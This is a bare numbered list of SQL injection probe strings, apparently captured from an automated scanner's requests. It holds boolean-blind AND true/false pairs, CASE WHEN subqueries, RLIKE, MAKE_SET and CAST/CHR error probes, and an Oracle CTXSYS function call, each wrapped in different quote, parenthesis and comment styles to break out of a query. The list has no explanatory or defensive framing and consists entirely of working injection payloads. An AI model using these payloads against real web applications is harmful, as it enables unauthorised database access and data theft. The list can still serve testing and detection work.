|11|'
|12|'
|13|'
|14|2634
|15|'.,(,&quot;.())'
|16|''oDNjrn&lt;'&quot;&gt;KRozRP
|17|') AND 3565=5219-- zbNH
|18|') AND 3016=3016-- tvEy
|19|'' AND 8136=3843-- DXAY
|20|'' AND 3016=3016-- EiNo
|21|') AND 7902=8191 AND (6176=6176
|22|') AND 3016=3016 AND (9494=9494
|23|')) AND 8807=4851 AND ((1670=1670
|24|')) AND 3016=3016 AND ((9161=9161
|25|'))) AND 4539=8149 AND (((2614=2614
|26|'))) AND 3016=3016 AND (((1250=1250
|27|' AND 7630=1958
|28|' AND 3016=3016
|29|'') AND 8786=7822 AND ('ipxZ'='ipxZ
|30|'') AND 3016=3016 AND ('keLd'='keLd
|31|'')) AND 5320=1842 AND (('ZTYr'='ZTYr
|32|'')) AND 3016=3016 AND (('KjLh'='KjLh
|33|''))) AND 7174=1624 AND ((('AADw'='AADw
|34|''))) AND 3016=3016 AND ((('dhYb'='dhYb
|35|'' AND 4753=3846 AND 'UmnY'='UmnY
|36|'' AND 3016=3016 AND 'bhMj'='bhMj
|37|'' AND 5368=8588 AND 'EIwR'='EIwR
|38|'') AND 5749=4587 AND ('wmyi' LIKE 'wmyi
|39|'') AND 3016=3016 AND ('fspK' LIKE 'fspK
|40|'')) AND 4221=7853 AND (('UQvm' LIKE 'UQvm
|41|'')) AND 3016=3016 AND (('jfET' LIKE 'jfET
|42|'%' AND 8671=7750 AND 'xWvU%'='xWvU
|43|'%' AND 3016=3016 AND 'xxfU%'='xxfU
|44|'%' AND 1785=4492 AND 'dley%'='dley
|45|'' AND 8040=1607 AND 'yaZH' LIKE 'yaZH
|46|'' AND 3016=3016 AND 'cGUk' LIKE 'cGUk
|47|'' AND 1146=9751 AND 'hCzb' LIKE 'hCzb
|48|'&quot;) AND 1371=9064 AND (&quot;fKUy&quot;=&quot;fKUy
|49|'&quot;) AND 3016=3016 AND (&quot;cunl&quot;=&quot;cunl
|50|'&quot;)) AND 9143=9427 AND ((&quot;Hkmt&quot;=&quot;Hkmt
|51|'&quot;)) AND 3016=3016 AND ((&quot;yQJo&quot;=&quot;yQJo
|52|'&quot; AND 9599=3435 AND &quot;uzNc&quot;=&quot;uzNc
|53|'&quot; AND 3016=3016 AND &quot;cECX&quot;=&quot;cECX
|54|'&quot;) AND 4641=7406 AND (&quot;rSBS&quot; LIKE &quot;rSBS
|55|'&quot;) AND 3016=3016 AND (&quot;OVCq&quot; LIKE &quot;OVCq
|56|'&quot; AND 8515=2676 AND &quot;xjwQ&quot; LIKE &quot;xjwQ
|57|'&quot; AND 3016=3016 AND &quot;PrZl&quot; LIKE &quot;PrZl
|58|' AND 5800=6312-- eWaZ
|59|' AND 3016=3016-- xuGa
|60|' AND 4350=6296# ZslZ
|61|' AND 3016=3016# xTdl
|62|'' AND 8720=3226 OR 'OOAy'='BfOq
|63|'' AND 3016=3016 OR 'GXdj'='Trag
|64|'' AND 8281=9644 OR 'MEAS'='payR
|65|') AND 9794=(SELECT (CASE WHEN (9794=1638) THEN 9794 ELSE (SELECT 1638 UNION SELECT 3995) END))-- SQyd
|66|') AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- tkVe
|67|'' AND 2946=(SELECT (CASE WHEN (2946=8543) THEN 2946 ELSE (SELECT 8543 UNION SELECT 5930) END))-- cVlW
|68|'' AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- gAPT
|69|')) AND 2719=(SELECT (CASE WHEN (2719=6544) THEN 2719 ELSE (SELECT 6544 UNION SELECT 4769) END))-- vrKM
|70|')) AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- LVHa
|71|'))) AND 3769=(SELECT (CASE WHEN (3769=9912) THEN 3769 ELSE (SELECT 9912 UNION SELECT 7961) END))-- GfuK
|72|'))) AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- yoxk
|73|' AND 9805=(SELECT (CASE WHEN (9805=8587) THEN 9805 ELSE (SELECT 8587 UNION SELECT 1539) END))-- xEoz
|74|' AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- kFOF
|75|'') AND 2667=(SELECT (CASE WHEN (2667=4824) THEN 2667 ELSE (SELECT 4824 UNION SELECT 8718) END))-- SSon
|76|'') AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- sXaj
|77|'')) AND 5001=(SELECT (CASE WHEN (5001=9081) THEN 5001 ELSE (SELECT 9081 UNION SELECT 4934) END))-- RyJo
|78|'')) AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- wZHC
|79|''))) AND 2662=(SELECT (CASE WHEN (2662=6998) THEN 2662 ELSE (SELECT 6998 UNION SELECT 9359) END))-- GzEJ
|80|''))) AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- TTvo
|81|'%' AND 1648=(SELECT (CASE WHEN (1648=7134) THEN 1648 ELSE (SELECT 7134 UNION SELECT 5249) END))-- mLEx
|82|'%' AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- uknQ
|83|'&quot;) AND 2588=(SELECT (CASE WHEN (2588=9194) THEN 2588 ELSE (SELECT 9194 UNION SELECT 4246) END))-- Nswm
|84|'&quot;) AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- EUpb
|85|'&quot;)) AND 5248=(SELECT (CASE WHEN (5248=4047) THEN 5248 ELSE (SELECT 4047 UNION SELECT 8226) END))-- WqBZ
|86|'&quot;)) AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- EQlh
|87|'&quot; AND 3828=(SELECT (CASE WHEN (3828=2459) THEN 3828 ELSE (SELECT 2459 UNION SELECT 1461) END))-- xrGB
|88|'&quot; AND 6366=(SELECT (CASE WHEN (6366=6366) THEN 6366 ELSE (SELECT 3824 UNION SELECT 9180) END))-- JPrq
|89|')) AND 2381=1033-- TcJX
|90|')) AND 5443=5443-- vkzZ
|91|'))) AND 1786=4120-- cPEc
|92|'))) AND 5443=5443-- SZWH
|93|'') AND 5566=6830-- ZmPS
|94|'') AND 5443=5443-- STxu
|95|'')) AND 9795=9963-- pgtD
|96|'')) AND 5443=5443-- uzuQ
|97|''))) AND 7827=3494-- WtWD
|98|''))) AND 5443=5443-- kQZk
|99|'%' AND 2085=5472-- towk
|100|'%' AND 5443=5443-- ELwx
|101|'&quot;) AND 5789=1491-- zeTP
|102|'&quot;) AND 5443=5443-- uZZg
|103|'&quot;)) AND 8175=2896-- wERF
|104|'&quot;)) AND 5443=5443-- dSHK
|105|'&quot; AND 8236=9058-- McaI
|106|'&quot; AND 5443=5443-- qXZa
|107|') AND 4504=2823#
|108|') AND 6476=6476#
|109|'' AND 5458=5746#
|110|'' AND 6476=6476#
|111|')) AND 2440=5385#
|112|')) AND 6476=6476#
|113|'))) AND 6376=8168#
|114|'))) AND 6476=6476#
|115|' AND 4649=9121#
|116|' AND 6476=6476#
|117|'') AND 8237=5716#
|118|'') AND 6476=6476#
|119|'')) AND 2895=6401#
|120|'')) AND 6476=6476#
|121|''))) AND 8017=7777#
|122|''))) AND 6476=6476#
|123|'%' AND 3732=7809#
|124|'%' AND 6476=6476#
|125|'&quot;) AND 2690=1877#
|126|'&quot;) AND 6476=6476#
|127|'&quot;)) AND 3301=1548#
|128|'&quot;)) AND 6476=6476#
|129|'&quot; AND 8769=4287#
|130|'&quot; AND 6476=6476#
|131|') AND 1271=8469
|132|') AND 4397=4397
|133|'' AND 5462=4809
|134|'' AND 4397=4397
|135|')) AND 4032=8515
|136|')) AND 4397=4397
|137|'))) AND 3755=5348
|138|'))) AND 4397=4397
|139|' AND 7677=8185
|140|' AND 4397=4397
|141|'') AND 1928=3461
|142|'') AND 4397=4397
|143|'')) AND 6403=8874
|144|'')) AND 4397=4397
|145|''))) AND 6001=3807
|146|''))) AND 4397=4397
|147|'%' AND 6719=4282
|148|'%' AND 4397=4397
|149|'&quot;) AND 7315=9589
|150|'&quot;) AND 4397=4397
|151|'&quot;)) AND 1285=3271
|152|'&quot;)) AND 4397=4397
|153|'&quot; AND 2873=3805
|154|'&quot; AND 4397=4397
|155|') RLIKE (SELECT (CASE WHEN (2014=2524) THEN 0x27 ELSE 0x28 END))-- zPdp
|156|') RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END))-- WNnV
|157|'' RLIKE (SELECT (CASE WHEN (9553=8127) THEN 0x27 ELSE 0x28 END))-- btvA
|158|'' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END))-- MwuQ
|159|') RLIKE (SELECT (CASE WHEN (8034=2019) THEN 0x27 ELSE 0x28 END)) AND (2245=2245
|160|') RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND (3429=3429
|161|')) RLIKE (SELECT (CASE WHEN (9694=3739) THEN 0x27 ELSE 0x28 END)) AND ((5075=5075
|162|')) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND ((6428=6428
|163|'))) RLIKE (SELECT (CASE WHEN (9499=7936) THEN 0x27 ELSE 0x28 END)) AND (((5026=5026
|164|'))) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND (((9772=9772
|165|' RLIKE (SELECT (CASE WHEN (7626=1832) THEN 0x27 ELSE 0x28 END))
|166|' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END))
|167|'') RLIKE (SELECT (CASE WHEN (2667=2069) THEN 0x27 ELSE 0x28 END)) AND ('wdCP'='wdCP
|168|'') RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND ('Dnby'='Dnby
|169|'')) RLIKE (SELECT (CASE WHEN (4678=8410) THEN 0x27 ELSE 0x28 END)) AND (('saoV'='saoV
|170|'')) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND (('aySe'='aySe
|171|''))) RLIKE (SELECT (CASE WHEN (4718=9817) THEN 0x27 ELSE 0x28 END)) AND ((('pqaP'='pqaP
|172|''))) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND ((('AFfj'='AFfj
|173|'' RLIKE (SELECT (CASE WHEN (3492=6276) THEN 0x27 ELSE 0x28 END)) AND 'nseP'='nseP
|174|'' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND 'LIZi'='LIZi
|175|'' RLIKE (SELECT (CASE WHEN (1169=7583) THEN 0x27 ELSE 0x28 END)) AND 'Kadl'='Kadl
|176|'') RLIKE (SELECT (CASE WHEN (6798=3749) THEN 0x27 ELSE 0x28 END)) AND ('HbLR' LIKE 'HbLR
|177|'') RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND ('QyNO' LIKE 'QyNO
|178|'')) RLIKE (SELECT (CASE WHEN (6451=1925) THEN 0x27 ELSE 0x28 END)) AND (('ULkX' LIKE 'ULkX
|179|'')) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND (('iCXO' LIKE 'iCXO
|180|'%' RLIKE (SELECT (CASE WHEN (9832=1860) THEN 0x27 ELSE 0x28 END)) AND 'UqdB%'='UqdB
|181|'%' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND 'NrVh%'='NrVh
|182|'%' RLIKE (SELECT (CASE WHEN (5346=8711) THEN 0x27 ELSE 0x28 END)) AND 'FpWn%'='FpWn
|183|'' RLIKE (SELECT (CASE WHEN (4456=8915) THEN 0x27 ELSE 0x28 END)) AND 'IbjU' LIKE 'IbjU
|184|'' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND 'Gblk' LIKE 'Gblk
|185|'' RLIKE (SELECT (CASE WHEN (2357=5084) THEN 0x27 ELSE 0x28 END)) AND 'RNLv' LIKE 'RNLv
|186|'&quot;) RLIKE (SELECT (CASE WHEN (2299=5903) THEN 0x27 ELSE 0x28 END)) AND (&quot;uixF&quot;=&quot;uixF
|187|'&quot;) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND (&quot;YrkW&quot;=&quot;YrkW
|188|'&quot;)) RLIKE (SELECT (CASE WHEN (3862=2680) THEN 0x27 ELSE 0x28 END)) AND ((&quot;gxRU&quot;=&quot;gxRU
|189|'&quot;)) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND ((&quot;fwGJ&quot;=&quot;fwGJ
|190|'&quot; RLIKE (SELECT (CASE WHEN (6159=6023) THEN 0x27 ELSE 0x28 END)) AND &quot;QSUf&quot;=&quot;QSUf
|191|'&quot; RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND &quot;kFxI&quot;=&quot;kFxI
|192|'&quot;) RLIKE (SELECT (CASE WHEN (8263=8865) THEN 0x27 ELSE 0x28 END)) AND (&quot;qYfp&quot; LIKE &quot;qYfp
|193|'&quot;) RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND (&quot;rmUv&quot; LIKE &quot;rmUv
|194|'&quot; RLIKE (SELECT (CASE WHEN (8845=3245) THEN 0x27 ELSE 0x28 END)) AND &quot;HCgN&quot; LIKE &quot;HCgN
|195|'&quot; RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) AND &quot;ewyL&quot; LIKE &quot;ewyL
|196|' RLIKE (SELECT (CASE WHEN (4941=5207) THEN 0x27 ELSE 0x28 END))-- FXyx
|197|' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END))-- ZPZn
|198|' RLIKE (SELECT (CASE WHEN (7474=8307) THEN 0x27 ELSE 0x28 END))# EAou
|199|' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END))# UraH
|200|'' RLIKE (SELECT (CASE WHEN (2656=2986) THEN 0x27 ELSE 0x28 END)) OR 'LAzW'='HxDt
|201|'' RLIKE (SELECT (CASE WHEN (3373=3373) THEN 0x27 ELSE 0x28 END)) OR 'gEDT'='otej
|202|'' RLIKE (SELECT (CASE WHEN (2709=2363) THEN 0x27 ELSE 0x28 END)) OR 'ckgf'='AfYD
|203|') AND MAKE_SET(8855=9709,9709)-- RNer
|204|') AND MAKE_SET(6794=6794,5567)-- yGQy
|205|'' AND MAKE_SET(7861=2929,2929)-- CbFq
|206|'' AND MAKE_SET(6794=6794,5567)-- wVBe
|207|') AND MAKE_SET(4982=4059,4059) AND (7897=7897
|208|') AND MAKE_SET(6794=6794,5567) AND (5300=5300
|209|')) AND MAKE_SET(8207=9247,9247) AND ((5754=5754
|210|')) AND MAKE_SET(6794=6794,5567) AND ((7646=7646
|211|'))) AND MAKE_SET(7090=7661,7661) AND (((9828=9828
|212|'))) AND MAKE_SET(6794=6794,5567) AND (((5769=5769
|213|' AND MAKE_SET(7597=6813,6813)
|214|' AND MAKE_SET(6794=6794,5567)
|215|'') AND MAKE_SET(5278=2778,2778) AND ('zHWP'='zHWP
|216|'') AND MAKE_SET(6794=6794,5567) AND ('nNRy'='nNRy
|217|'')) AND MAKE_SET(2713=6993,6993) AND (('XgdV'='XgdV
|218|'')) AND MAKE_SET(6794=6794,5567) AND (('JuQm'='JuQm
|219|''))) AND MAKE_SET(8596=7491,7491) AND ((('taDV'='taDV
|220|''))) AND MAKE_SET(6794=6794,5567) AND ((('FVcB'='FVcB
|221|'' AND MAKE_SET(4588=3886,3886) AND 'yfAT'='yfAT
|222|'' AND MAKE_SET(6794=6794,5567) AND 'yAiA'='yAiA
|223|'' AND MAKE_SET(7957=1996,1996) AND 'jfiV'='jfiV
|224|'') AND MAKE_SET(8826=4052,4052) AND ('vPXr' LIKE 'vPXr
|225|'') AND MAKE_SET(6794=6794,5567) AND ('MbDS' LIKE 'MbDS
|226|'')) AND MAKE_SET(2743=8484,8484) AND (('tmVe' LIKE 'tmVe
|227|'')) AND MAKE_SET(6794=6794,5567) AND (('MPxC' LIKE 'MPxC
|228|'%' AND MAKE_SET(6025=6613,6613) AND 'wBSA%'='wBSA
|229|'%' AND MAKE_SET(6794=6794,5567) AND 'oBVp%'='oBVp
|230|'%' AND MAKE_SET(8188=6444,6444) AND 'zSTO%'='zSTO
|231|'' AND MAKE_SET(8882=9904,9904) AND 'onwU' LIKE 'onwU
|232|'' AND MAKE_SET(6794=6794,5567) AND 'Ddfc' LIKE 'Ddfc
|233|'' AND MAKE_SET(7338=2847,2847) AND 'mQrL' LIKE 'mQrL
|234|'&quot;) AND MAKE_SET(8122=4576,4576) AND (&quot;FdGT&quot;=&quot;FdGT
|235|'&quot;) AND MAKE_SET(6794=6794,5567) AND (&quot;yklu&quot;=&quot;yklu
|236|'&quot;)) AND MAKE_SET(8897=3012,3012) AND ((&quot;bmJq&quot;=&quot;bmJq
|237|'&quot;)) AND MAKE_SET(6794=6794,5567) AND ((&quot;vBTW&quot;=&quot;vBTW
|238|'&quot; AND MAKE_SET(6145=1563,1563) AND &quot;bvtR&quot;=&quot;bvtR
|239|'&quot; AND MAKE_SET(6794=6794,5567) AND &quot;umhx&quot;=&quot;umhx
|240|'&quot;) AND MAKE_SET(8551=8827,8827) AND (&quot;FTmk&quot; LIKE &quot;FTmk
|241|'&quot;) AND MAKE_SET(6794=6794,5567) AND (&quot;Bkiz&quot; LIKE &quot;Bkiz
|242|'&quot; AND MAKE_SET(6185=6069,6069) AND &quot;IsKs&quot; LIKE &quot;IsKs
|243|'&quot; AND MAKE_SET(6794=6794,5567) AND &quot;NYtE&quot; LIKE &quot;NYtE
|244|' AND MAKE_SET(6404=5417,5417)-- GLJX
|245|' AND MAKE_SET(6794=6794,5567)-- XlIY
|246|' AND MAKE_SET(9725=9207,9207)# ZuWJ
|247|' AND MAKE_SET(6794=6794,5567)# OuUW
|248|'' AND MAKE_SET(7619=6335,6335) OR 'DxcN'='zEcm
|249|'' AND MAKE_SET(6794=6794,5567) OR 'FRyC'='sMpM
|250|'' AND MAKE_SET(1471=7139,7139) OR 'eSwR'='rMYU
|251|') AND (SELECT (CASE WHEN (6644=2019) THEN NULL ELSE CAST((CHR(70)&#124;&#124;CHR(101)&#124;&#124;CHR(69)&#124;&#124;CHR(82)) AS NUMERIC) END)) IS NULL-- Lymq
|252|') AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL-- rJsq
|253|'' AND (SELECT (CASE WHEN (3637=3153) THEN NULL ELSE CAST((CHR(77)&#124;&#124;CHR(106)&#124;&#124;CHR(80)&#124;&#124;CHR(82)) AS NUMERIC) END)) IS NULL-- Kbug
|254|'' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL-- MIVG
|255|') AND (SELECT (CASE WHEN (3848=6084) THEN NULL ELSE CAST((CHR(120)&#124;&#124;CHR(122)&#124;&#124;CHR(85)&#124;&#124;CHR(86)) AS NUMERIC) END)) IS NULL AND (8564=8564
|256|') AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND (5814=5814
|257|')) AND (SELECT (CASE WHEN (9999=9983) THEN NULL ELSE CAST((CHR(68)&#124;&#124;CHR(90)&#124;&#124;CHR(121)&#124;&#124;CHR(105)) AS NUMERIC) END)) IS NULL AND ((5650=5650
|258|')) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND ((2655=2655
|259|'))) AND (SELECT (CASE WHEN (5171=7668) THEN NULL ELSE CAST((CHR(82)&#124;&#124;CHR(73)&#124;&#124;CHR(83)&#124;&#124;CHR(103)) AS NUMERIC) END)) IS NULL AND (((3920=3920
|260|'))) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND (((5607=5607
|261|' AND (SELECT (CASE WHEN (6835=5843) THEN NULL ELSE CAST((CHR(119)&#124;&#124;CHR(81)&#124;&#124;CHR(69)&#124;&#124;CHR(98)) AS NUMERIC) END)) IS NULL
|262|' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL
|263|'') AND (SELECT (CASE WHEN (7084=8376) THEN NULL ELSE CAST((CHR(102)&#124;&#124;CHR(113)&#124;&#124;CHR(78)&#124;&#124;CHR(69)) AS NUMERIC) END)) IS NULL AND ('lkyn'='lkyn
|264|'') AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND ('OuCO'='OuCO
|265|'')) AND (SELECT (CASE WHEN (4037=5182) THEN NULL ELSE CAST((CHR(82)&#124;&#124;CHR(111)&#124;&#124;CHR(115)&#124;&#124;CHR(102)) AS NUMERIC) END)) IS NULL AND (('eLyL'='eLyL
|266|'')) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND (('lWkY'='lWkY
|267|''))) AND (SELECT (CASE WHEN (9476=9933) THEN NULL ELSE CAST((CHR(119)&#124;&#124;CHR(67)&#124;&#124;CHR(108)&#124;&#124;CHR(104)) AS NUMERIC) END)) IS NULL AND ((('gMyR'='gMyR
|268|''))) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND ((('jnXF'='jnXF
|269|'' AND (SELECT (CASE WHEN (9691=6483) THEN NULL ELSE CAST((CHR(98)&#124;&#124;CHR(112)&#124;&#124;CHR(77)&#124;&#124;CHR(98)) AS NUMERIC) END)) IS NULL AND 'gOVC'='gOVC
|270|'' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND 'wSWz'='wSWz
|271|'') AND (SELECT (CASE WHEN (4121=6028) THEN NULL ELSE CAST((CHR(109)&#124;&#124;CHR(117)&#124;&#124;CHR(74)&#124;&#124;CHR(113)) AS NUMERIC) END)) IS NULL AND ('MvTW' LIKE 'MvTW
|272|'') AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND ('AqHi' LIKE 'AqHi
|273|'')) AND (SELECT (CASE WHEN (9030=4633) THEN NULL ELSE CAST((CHR(76)&#124;&#124;CHR(89)&#124;&#124;CHR(90)&#124;&#124;CHR(74)) AS NUMERIC) END)) IS NULL AND (('Xicg' LIKE 'Xicg
|274|'')) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND (('gSjz' LIKE 'gSjz
|275|'%' AND (SELECT (CASE WHEN (5383=5008) THEN NULL ELSE CAST((CHR(86)&#124;&#124;CHR(84)&#124;&#124;CHR(98)&#124;&#124;CHR(81)) AS NUMERIC) END)) IS NULL AND 'jHsa%'='jHsa
|276|'%' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND 'zFkA%'='zFkA
|277|'' AND (SELECT (CASE WHEN (3727=4703) THEN NULL ELSE CAST((CHR(65)&#124;&#124;CHR(122)&#124;&#124;CHR(85)&#124;&#124;CHR(72)) AS NUMERIC) END)) IS NULL AND 'DGDr' LIKE 'DGDr
|278|'' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND 'gzLd' LIKE 'gzLd
|279|'&quot;) AND (SELECT (CASE WHEN (8595=5870) THEN NULL ELSE CAST((CHR(80)&#124;&#124;CHR(79)&#124;&#124;CHR(68)&#124;&#124;CHR(81)) AS NUMERIC) END)) IS NULL AND (&quot;JcqE&quot;=&quot;JcqE
|280|'&quot;) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND (&quot;fVuY&quot;=&quot;fVuY
|281|'&quot;)) AND (SELECT (CASE WHEN (7460=8814) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(75)&#124;&#124;CHR(99)&#124;&#124;CHR(85)) AS NUMERIC) END)) IS NULL AND ((&quot;hCNB&quot;=&quot;hCNB
|282|'&quot;)) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND ((&quot;tbqH&quot;=&quot;tbqH
|283|'&quot; AND (SELECT (CASE WHEN (1070=3865) THEN NULL ELSE CAST((CHR(78)&#124;&#124;CHR(72)&#124;&#124;CHR(71)&#124;&#124;CHR(69)) AS NUMERIC) END)) IS NULL AND &quot;LaGO&quot;=&quot;LaGO
|284|'&quot; AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND &quot;nXft&quot;=&quot;nXft
|285|'&quot;) AND (SELECT (CASE WHEN (1743=4415) THEN NULL ELSE CAST((CHR(90)&#124;&#124;CHR(110)&#124;&#124;CHR(82)&#124;&#124;CHR(79)) AS NUMERIC) END)) IS NULL AND (&quot;EYyV&quot; LIKE &quot;EYyV
|286|'&quot;) AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND (&quot;NPna&quot; LIKE &quot;NPna
|287|'&quot; AND (SELECT (CASE WHEN (4291=9994) THEN NULL ELSE CAST((CHR(99)&#124;&#124;CHR(100)&#124;&#124;CHR(105)&#124;&#124;CHR(79)) AS NUMERIC) END)) IS NULL AND &quot;DvFE&quot; LIKE &quot;DvFE
|288|'&quot; AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL AND &quot;ppbM&quot; LIKE &quot;ppbM
|289|' AND (SELECT (CASE WHEN (2021=6604) THEN NULL ELSE CAST((CHR(86)&#124;&#124;CHR(87)&#124;&#124;CHR(108)&#124;&#124;CHR(111)) AS NUMERIC) END)) IS NULL-- pnlL
|290|' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL-- ZsEy
|291|' AND (SELECT (CASE WHEN (8422=4009) THEN NULL ELSE CAST((CHR(87)&#124;&#124;CHR(107)&#124;&#124;CHR(111)&#124;&#124;CHR(69)) AS NUMERIC) END)) IS NULL# KnfK
|292|' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL# HyfE
|293|'' AND (SELECT (CASE WHEN (6111=2031) THEN NULL ELSE CAST((CHR(74)&#124;&#124;CHR(78)&#124;&#124;CHR(98)&#124;&#124;CHR(69)) AS NUMERIC) END)) IS NULL OR 'OzWS'='FdHx
|294|'' AND (SELECT (CASE WHEN (6337=6337) THEN NULL ELSE CAST((CHR(100)&#124;&#124;CHR(86)&#124;&#124;CHR(111)&#124;&#124;CHR(78)) AS NUMERIC) END)) IS NULL OR 'ERsO'='ZUZX
|295|') AND (SELECT (CASE WHEN (1080=6304) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1080) END) FROM DUAL) IS NULL-- YtZu
